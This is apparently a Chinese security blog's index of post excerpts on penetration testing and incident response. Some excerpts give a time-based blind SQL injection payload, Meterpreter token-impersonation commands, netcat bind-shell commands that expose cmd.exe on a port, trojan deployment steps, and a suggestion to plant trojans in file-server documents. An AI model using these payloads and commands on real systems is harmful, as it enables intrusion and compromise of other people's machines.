摘要:
一、语句 测试语句: if(ascii(mid(1,1,1))like(49),sleep(3),1) 1、表: if(ascii(mid((select(group_concat(table_name))from(information_schema.tables)where((table_sch 阅读全文
摘要:
一、开机启动项检查 1、利用操作系统中的启动菜单 C:\Users\Administrator\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup 2、利用系统配置 msconfig 3、利用注册表 HKEY_CURRENT_U 阅读全文
摘要:
一、创建一个项目 File → New → Projects → win32 Console Application → Ok → A "Hello, World!" application → Finish → Ok → FileView → test.cpp 1、快捷键 F5 运行 F7 编译 阅读全文
摘要:
一、信息搜集 1、域名whois信息,获取注册人电话邮箱姓名 2、查看是否是代理,如果是放弃,不是用来反查扩大攻击面(获取常用账户或密码) 3、域名信息不是代理注册,可以用来做字典,进行爆破 4、子域名收集 二、系统信息搜集 1、查看是windows还是linux 2、查看是否存在ms17-010等 阅读全文
摘要:
一、分析服务器网络服务 1、看开启哪些服务端口 2、针对端口容易被攻击的方法 3、服务器补丁 4、日志分析 5、服务开启的权限 二、被提权 1、查看补丁 2、查看账号情况(看注册表) 3、查看网络连接 4、分析进程 5、分析注册表启动项 6、分析日志 7、分析一些提权工具,一般在会在回收站或者网站目 阅读全文
摘要:
一、列举令牌 msf中只有获取到管理员权限才能列举其他令牌(可能是因为系统本版问题,反正我试了很多次都只有管理员权限才能) use incognito list_tokens -u 二、假冒令牌 假冒令牌XF域的管理员令牌 impersonate_token XF\\administrator 三、 阅读全文
摘要:
一、安装 服务端要以管理员权限运行 客户端 二、监听 三、生成木马 四、受害者上线 五、执行命令 所要执行的命令前面加一个shell 六、脚本添加 七、进程迁移 阅读全文
摘要:
一、了解网络(信息搜集) 1、分析网络中有哪些主机(PC,SERVER,/LINUX/WINDOWS打印机) 2、分析服务,分析端口 3、服务器攻击方法 爆破 漏洞 smb 欺骗 钓鱼 二、流量监听工具的使用 1、cain 2、wireshark 三、hydra 参数详解: -R 根据止一次进度继续 阅读全文
摘要:
一、NC 目标机 nc.exe -l -p 1122 -t -e cnd.exe 攻击机 nc.exe 192.168.8.149 1122 二、termite 程序地址, http://rootkiter.com/Termite/ 一款极度小巧灵活的跳板机,有别于传统socks代理,它对于复杂内网 阅读全文
摘要:
一、内网信息搜集 1、对内网的拓补图进行分析 2、对当前机器角色进行分析 判断当前主机是web服务器 开发测试服务器:可以得到公司产品源码 公共服务器 文件服务器:可以用木马替换文件服务器里面的word,内网主机打开就上线 代理服务器:获取账号,用来撞库 dns服务器:可以探测是否拥有内网服务器,或 阅读全文